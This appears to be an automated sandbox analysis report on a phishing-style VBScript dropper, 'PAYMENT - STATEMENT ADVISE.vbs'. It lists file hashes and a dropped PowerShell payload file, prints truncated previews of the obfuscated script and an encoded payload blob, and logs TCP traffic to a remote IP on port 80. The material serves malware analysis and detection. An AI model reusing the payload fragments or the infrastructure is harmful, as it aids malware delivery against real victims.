                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                Malicious:false
                Preview:..

                C:\Users\user\AppData\Roaming\Angiosperm.Afm

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with very long lines (65536), with no line terminators
                Category:dropped
                Size (bytes):491856
                Entropy (8bit):5.87340617368492
                Encrypted:false
                SSDEEP:6144:ZGYZ6AtwmJdx8kzglzSpRooVAPqIQh7BlKaX8pKqhTiLZL8qoXmFJ6dtDfKINmY4:UjmPelzSpRooykySkTwZL8qoqJ0W2q
                MD5:6D536D802644EE3072E0E4BD701758A4
                SHA1:B802B7871E1DB6D28B03037F313312FA7C710D38
                SHA-256:F5DE199F85BC385767FF544322ACC7C0F35F72AF09A138F0D87BCFB48641B7A1
                SHA-512:CD080BCB2163EB01E17AA4AE88651754F2F2775192FA67F1850079BD8E5A47FD7FF73A31F55B2A56E234C06890F583F27473181E1F3B97DBA0053541350A408D
                Malicious:false
                Preview:cQGbcQGbuzTaGQDrArgBcQGbA1wkBOsCjt1xAZu5qNyt4OsC7PJxAZuB8cCWqmFxAZvrAkYvgfFoSgeB6wL/InEBm3EBm+sCvQG6N1iNTHEBm+sCi1dxAZvrAnn5McpxAZtxAZuJFAvrAj1N6wKnktHicQGb6wJn3YPBBOsCiA5xAZuB+YxIXgR8y+sCKcrrAl4+i0QkBOsCa5ZxAZuJw3EBm+sCRdOBwzHZHALrAuPI6wKtq7q7o4OgcQGb6wLtwYHyzhNlo3EBm3EBm4HCi08Z/OsCpPFxAZtxAZtxAZtxAZvrAk/YiwwQcQGbcQGbiQwTcQGb6wLR5ELrAldMcQGbgfo0KwUAddbrAl4O6wLYcIlcJAxxAZtxAZuB7QADAABxAZtxAZuLVCQIcQGb6wKpKIt8JARxAZtxAZuJ6+sC2AxxAZuBw5wAAABxAZvrAhczU3EBm+sCzmFqQOsCUs9xAZuJ63EBm+sCHpHHgwABAAAAMHsE6wLFeusCPi6BwwABAADrAqni6wKtxFPrAgsycQGbievrArh66wLKMIm7BAEAAHEBm+sCjT2BwwQBAABxAZtxAZtTcQGb6wKvsmr/cQGb6wLxCYPCBesC5BpxAZsx9nEBm3EBmzHJ6wKhvnEBm4sacQGb6wKSgkFxAZvrAl+tORwKdfNxAZvrAgzYRnEBm+sCg2CAfAr7uHXdcQGbcQGbi0QK/HEBm+sCXPcp8OsCh2DrApTB/9JxAZvrAipFujQrBQDrAjQwcQGbMcBxAZtxAZuLfCQMcQGbcQGbgTQHeFg3SOsC1i9xAZuDwARxAZtxAZs50HXlcQGbcQGbiftxAZvrAgu6/9dxAZvrAvFvQKUOkfG9tqTjrYFI+Zysus5YYsGd4S1mJXq2ufnWkdD5qaaAYOS2uWow1E4e3faPPFU3TxcnXS5BiA6A+Sw6SAObouP5LDpICGpiBfksOkh0xojEv91gSnhYDPgTwrbNL1o3SBOC8iD9

                Static File Info

                General

                File type:ASCII text, with CRLF line terminators
                Entropy (8bit):5.491291237279013
                TrID:
                • Visual Basic Script (13500/0) 100.00%
                File name:PAYMENT - STATEMENT ADVISE.vbs
                File size:23'061 bytes
                MD5:8e3c190eff5e1e796f9cd8ac0eb18d0b
                SHA1:751c299c930a6975b1f311c3d645554d0cfe8654
                SHA256:a1b94e324beb19da2cabb254652df7c75dfcdad3c099012bb10e06448198d204
                SHA512:a83264a4fce9bcfb6be07acf57e3122fb6b3d4e6efe43c014da59b49d8809d6a51c898077243c1c953fbf2b25453968972b5ca29c9eefa4dbebcb3384db83a06
                SSDEEP:384:w2+0bMHc3lcf0ghreYjfrPQ8dmc6qRloM9zKzUn/r:y0cc3yfdNTY8dnbEUnT
                TLSH:A1A22B1A1885DBDB7DEB2BFAC3092CE4DD3015E2453D02E82F8DA4E1790D6643D1A9D7
                File Content Preview:....Rapsoderreptatorystet203="Defaitistiske"..Spioniformiatrihalidefris210 = LCAse(Rapsoderreptatorystet203)......Whitedamp = Vitrifying40......Set Differentness = CreateObject("WScript.Shell")......Call Polyptote("cls;write 'Recovers Rowth Afhaengighed")

                File Icon

                Icon Hash:68d69b8f86ab9a86

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jul 5, 2024 07:13:00.153295040 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:00.158266068 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:00.158370972 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:00.158648014 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:00.164195061 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.116761923 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.116781950 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.116795063 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.116867065 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:01.116915941 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.116929054 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.116981030 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:01.367495060 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.367538929 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.367551088 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.367619991 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.367633104 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.367640018 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:01.367679119 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:01.367748976 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.367760897 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.367772102 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.367799044 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:01.367820024 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:01.368371964 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.368520021 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.368530035 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.368580103 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:01.616668940 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.616704941 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.616715908 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.616763115 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:01.616813898 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.616826057 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.616872072 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:01.617042065 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.617089987 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:01.617100954 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.617113113 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.617151976 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:01.617244959 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.617257118 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.617300987 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:01.617959023 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.618016958 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.618032932 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.618083954 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:01.618128061 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.618139029 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.618186951 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:01.865417957 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.865521908 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.865531921 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.865607023 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.865619898 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.865634918 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.865741968 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:01.865741968 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:01.865945101 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.866024971 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.866036892 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.866066933 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:01.866156101 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.866168022 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.866178036 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.866204977 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:01.866231918 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:01.866940975 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.866952896 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.866962910 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.866986036 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:01.867345095 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.867389917 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:01.867563963 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.867575884 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.867590904 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.867602110 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.867609978 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:01.867614031 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.867638111 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:01.868324995 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.868377924 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:01.868468046 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:01.920578003 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.116276026 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.116295099 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.116305113 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.116439104 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.116451025 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.116461039 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.116472006 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.116601944 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.116601944 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.116686106 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.116734028 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.116770983 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.116782904 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.116820097 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.116919994 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.116931915 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.116941929 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.116971970 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.117360115 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.117412090 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.117487907 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.117501020 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.117537975 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.117603064 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.117614031 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.117628098 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.117640018 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.117651939 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.117696047 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.118257046 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.118326902 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.118338108 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.118371010 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.118449926 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.118508101 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.118510008 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.118520021 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.118530989 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.118561029 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.119128942 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.119173050 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.119288921 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.170624971 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.535415888 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.535432100 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.535444021 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.535479069 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.535520077 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.535531998 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.535542965 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.535553932 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.535562992 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.535587072 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.535744905 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.535756111 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.535792112 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.535859108 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.535877943 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.535888910 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.535902023 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.535903931 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.535913944 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.535927057 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.535937071 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.535939932 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.535968065 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.535975933 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.536827087 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.536838055 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.536847115 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.536856890 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.536868095 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.536879063 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.536890030 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.536890030 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.536900997 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.536909103 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.536915064 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.536916971 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.536927938 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.536937952 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.536942005 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.536948919 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.536961079 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.536969900 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.536978960 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.537012100 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.537416935 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.537427902 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.537439108 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.537450075 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.537460089 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.537471056 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.537481070 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.537483931 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.537493944 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.537503958 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.537512064 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.537523031 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.537523031 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.537542105 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.537574053 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.537908077 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.537919044 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.537952900 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.592320919 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.615021944 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.615266085 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.615278959 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.615289927 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.615307093 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.615319014 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.615324974 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.615382910 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.615395069 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.615447044 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.615470886 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.615470886 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.615470886 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.615531921 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.615672112 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.615758896 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.615770102 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.615802050 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.615871906 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.615920067 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.615942001 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.615999937 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.616010904 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.616046906 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.616153002 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.616163969 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.616173983 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.616203070 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.616238117 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.616338015 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.616350889 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.616393089 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.616664886 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.616734982 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.616745949 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.616772890 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.616923094 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.616939068 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.616950989 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.616962910 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.616965055 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.616988897 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.617167950 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.617180109 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.617191076 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.617211103 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.617223024 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.617630959 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.617688894 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.617700100 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.617724895 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.617898941 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.617916107 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.617927074 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.617939949 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.617939949 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.617966890 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.618149042 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.618160963 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.618170023 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.618194103 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.618221045 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.618607998 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.618683100 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.618695021 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.618721962 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.618833065 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.618844032 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.618854046 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.618865013 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.618874073 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.618886948 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.619052887 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.619093895 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.619096041 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.619110107 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.619148970 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.619575024 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.619651079 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.619685888 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.704950094 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.748756886 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.865127087 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.865179062 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.865190029 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.865328074 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.865343094 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.865354061 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.865358114 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.865398884 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.865428925 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.865602016 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.865617990 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.865628958 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.865641117 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.865672112 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.865700960 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.865888119 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.865900993 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.865911007 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.865922928 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.865933895 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.865938902 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.865951061 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.865961075 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.865971088 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.865976095 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.865983963 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.865995884 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.866022110 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.866461992 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.866508961 CEST4970580192.168.2.5103.237.86.247
                Jul 5, 2024 07:13:02.866509914 CEST8049705103.237.86.247192.168.2.5
                Jul 5, 2024 07:13:02.866523981 CEST8049705103.237.86.247192.168.2.5
